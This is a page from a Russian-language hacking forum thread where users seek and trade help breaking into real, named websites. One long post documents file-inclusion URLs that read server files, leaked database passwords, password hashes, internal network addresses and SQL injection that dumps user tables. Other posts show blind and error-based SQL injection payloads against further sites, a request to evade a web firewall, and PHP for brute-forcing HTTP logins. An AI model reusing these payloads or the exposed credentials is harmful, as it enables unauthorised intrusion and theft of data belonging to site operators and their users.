Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    436
    Likes Received:
    46
    Reputations:
    40
    unhex(hex(admin_username))
    aes_descrypt(aes_encrypt(admin_username,12),12)
    или таблица находится в другой бд.
     
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    217
    Likes Received:
    105
    Reputations:
    50
    ты хоть сам то понял что написал?
     
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    А никак ты это не сделаешь, там формы как таковой нету. Вот пример http авторизации на пхп
    PHP:
    <?php
    $result 
    http_auth('http://site.ru/admin/','username','password');
    echo 
    $result;

    function 
    http_auth($url,$login,$password) {
    $ch curl_init($url);    
     
    curl_setopt($chCURLOPT_RETURNTRANSFER1);   
     
    curl_setopt($chCURLOPT_USERPWD$login.":".$password);   
    $result curl_exec($ch);   
     return 
    $result;
    }

    ?>
    ну а с брутом там сам разбирайся, не думаю что это сложно.
     
  4. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

    Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

    ну вот что то такое... хотелось бы не много подробнее про это
     
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?
     
    1 person likes this.
  6. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    что можно сделать если у сайта открыт порт 8080 ? сканер пишет критическая уязвимость, вот хочу понять почему и как ей пользоваться
     
  7. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    65
    Likes Received:
    4
    Reputations:
    3
    попал в админку через скулю типа 1 or 1 =1 --

    в админке нет возможности залить шелл, хотя была, но какието уроды, которые там уже побывали раз*бали всё. Но я нашол там локальный инклуд, но на серваке стоит mod_secury который фильтрует и в гете и посте данные типа /etc/passwd, Хотя /etc/hosts - прошол. помогите обойти плиз mod_securuty для локального инклуда плиз.
     
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,130
    Likes Received:
    604
    Reputations:
    690
    Параноикам )

    короче ситуация такая ...
    цель залить шелл на driverguide.com
    найденные баги etc...
    http://forums.driverguide.com/ форум Булка
    http://myupdates.com/static.php?typ...//../..//../..//etc/passwd&files=screen,style
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/passwd
    что то etc/passwd разные показывает хотя файл тот же =\

    http://myupdates.com/static.php?type=css&files=../index.php
    http://myupdates.com/static.php?typ....com/members//icx/general/filesystem.inc.php
    http://myupdates.com/static.php?typ.../home/../../driverguide/home/aptimus.inc.php
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts
    http://myupdates.com/static.php?typ...cx/driverguide/home//support/support.inc.php
    http://myupdates.com/static.php?typ.../members/icx/driverguide/home/voyeur.inc.php
    http://myupdates.com/static.php?typ.../ums/driverguide_conf/aptimus_login.xinc.php
    http://myupdates.com/static.php?typ....com/members//icx/general/filesystem.inc.php
    http://myupdates.com/static.php?typ....com/members/icx/driverguide/home/robots.php
    http://myupdates.com/static.php?type=css&files=../../../../icx/ums/ums_instance.php
    http://myupdates.com/static.php?typ.../../../../../../../etc/httpd/conf/httpd.conf
    http://myupdates.com/static.php?typ..../../../../../../../var/log/httpd/access_log
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts
    Path: DocumentRoot /home/httpd/driverguide.com/beta/public
    дальше ....
    http://myupdates.com/static.php?typ...rguide.com/forums/public/includes/config.php
    данные БД но коннекта внешне нема =(
    Code:
    $config['Database']['dbtype'] = 'mysql';
    
    $config['Database']['dbname'] = 'vb3';
    
    $config['Database']['tableprefix'] = 'vb3_';
    
    $config['Database']['technicalemail'] = '';
    
    $config['Database']['force_sql_mode'] = false;
    
    
    $config['MasterServer']['servername'] = '192.168.1.194';
    $config['MasterServer']['port'] = 3306;
    
    $config['MasterServer']['username'] = 'betav2';
    $config['MasterServer']['password'] = 'betav2a';
    
    $config['MasterServer']['usepconnect'] = 0;
    
    
    $config['SlaveServer']['servername'] = '';
    $config['SlaveServer']['port'] = 3306;
    $config['SlaveServer']['username'] = '';
    $config['SlaveServer']['password'] = '';
    $config['SlaveServer']['usepconnect'] = 0;
    Версия Linux version 2.4.21-60.ELsmp (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
    Локалка/соседы
    192.168.1.244 web6.driverguide.com web6
    192.168.1.211 web1.driverguide.com web1
    192.168.1.212 web2.driverguide.com web2
    192.168.1.214 web3.driverguide.com web3
    192.168.1.215 web4.driverguide.com web4
    192.168.1.243 web5.driverguide.com web5
    127.0.0.1 members-images.driverguide.net
    192.168.1.219 eml.driverguide.com
    192.168.1.244 members.driverguide.com members
    192.168.1.244 forums.driverguide.com forums
    192.168.1.244 beta.driverguide.com beta
    192.168.1.244 list.driverguide.com list
    192.168.1.220 db1.driverguide.com db1
    192.168.1.219 email.driverguide.net email
    192.168.1.211 web1-internal.driverguide.net
    192.168.1.212 web2-internal.driverguide.net

    http://members.driverguide.com//internal/phpMyAdmin/
    пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
    http://myupdates.com/internal/admin/
    http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
    editor:7vr1es1uwzlqI DES
    в Форуме 91к юзверов дамп ваше =)
    -added-
    http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
    editor:7vr1es1uwzlqI
    http://members.driverguide.com//internal/phpMyAdmin/
    Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

    Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
    путь с веба /internal/phpMyAdmin/ но млин
    $config['MasterServer']['username'] = 'betav2';
    $config['MasterServer']['password'] = 'betav2a';

    http://myupdates.com/internal/admin/
    вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00
    Code:
    $database = "driverdb__live";	// MySQL database name
    $dbuser = "dev";	// MySQL username
    $dbpass = "dbd3v";	// MySQL password
    $host = "192.168.1.194";	 // MySQL host name
    moderatorPassword = "mod123";	// to login as a moderator
    $spyPassword = "spy123";	 // to login as a spy (disabled when using XOOPS)
    еще кое что откопал
    http://myupdates.com/static.php?typ...httpd/icentric.com/intranet/public/.htpasswd
    http://intranet.icentric.com/
    intranet:f68alIucmxrmU
    quincy:B7B2pTzqkrdbQ
    опять DES
    http://blog.driverguide.com/wp-login.php стоит ВП

    Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
    что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
    ===
    короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguide_blog.wp_users+/*&action=getinfo
    Code:
    <title>dev@192.168.1.222 ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>
    http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limit+1,100000/*&action=getinfo
    <title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

    a1e5555abefe434946e95f0de3fb2787 : Shaaolin
    quincy:B7B2pTzqkrdbQ:p51s
    http://intranet.icentric.com/
    http://myupdates.com/internal/admin/
    http://members.driverguide.com/internal/phpMyAdmin/
    короче никуда не подошел или фильтр по айпи или хз =\
    есть идеи ?
    P.S Сорри за много букаф )
     
    _________________________
    1 person likes this.
  9. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    206
    Likes Received:
    92
    Reputations:
    11
    Есть XSS. Каким образом можно сделать iframe на всё окно?
     
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    314
    Reputations:
    163
  11. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    206
    Likes Received:
    92
    Reputations:
    11
  12. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    есть инъекция 4 ветка

    http://gay.ks.ua/links.php?catid=32+and+substring(version(),1,1)=4 :)))

    помогите правильно составить запрос, что бы вывод был в ошибке.
    или здесь только крутить как слепую?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    Херсонский гей-портал :D
     
    _________________________
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://gay.ks.ua/links.php?catid=32+order+by+4--
    http://gay.ks.ua/links.php?catid=-32+union+select+1,2,3,4--

    колонки не видны

    ищи скул в другом скрипте

    вот еще инфа

    http://gay.ks.ua/links.php?catid=32+and+substring(user(),1,1)=char(103)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),2,1)=char(97)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),3,1)=char(121)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),4,1)=char(107)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),5,1)=char(115)


    юзер-gayks

    http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile_os,1,1)=char(112)
    http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile_os,2,1)=char(99)

    думаю ос pc-linux
     
    _________________________
    #12754 Konqi, 8 May 2010
    Last edited: 8 May 2010
  15. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    http://gay.ks.ua/links.php?catid=32 order by 5
    =>
    Unknown column '5' in 'order clause'
    => по идее можно выводить данные через ошибку
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    на пример
     
    _________________________
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    я про то, что вывод ошибки можно поймать
    а вот использовать методы из Вывод информации в ошибке для MySQL всех версий у меня не получилось. может у вас получится ;)

    http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM mysql.users
    =>
    SELECT command denied to user: 'gayks_admin@localhost' for table 'users'

    http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM users
    =>
    Table 'gayks_phorum.users' doesn't exist

    прогнал тулзой пашкелы подбор таблиц (без префикса), нашла только одну - video:
    http://gay.ks.ua/links.php?catid=32 UNION SELECT id FROM video
    =>
    The used SELECT statements have a different number of columns
     
    #12757 DrakonHaSh, 8 May 2010
    Last edited: 8 May 2010
    1 person likes this.
  18. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    92
    Likes Received:
    109
    Reputations:
    21
    gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)=4.0
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    database() - gayks

    щас всем народом будем взломать гей портал
     
    _________________________
  20. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    заметил у них на на форуме:
    Copyright BOY-UANIC 2002-2010
    сходил в гугл, нашел это:
    http://www.eu-football.info/_links.php?catid=10 and+substring(version(),1,1)=5
    т.е. тот же движ, но mysql - 5-ка, соответственно в ней скорее всего можно все, что надо, подсмотреть ;)

    балин, и тут облом :)
    http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+
    =>
    SELECT command denied to user 'gbua_f00t'@'213.186.117.208' for table 'tables'

    а вот таблица video и здесь присутствует:
    http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)* 2))+from+video+group+by+2)a)--+
    =>
    Duplicate entry '5.0.45-community-nt-log1' for key 1
     
    #12760 DrakonHaSh, 8 May 2010
    Last edited: 8 May 2010
Loading...
Thread Status:
Not open for further replies.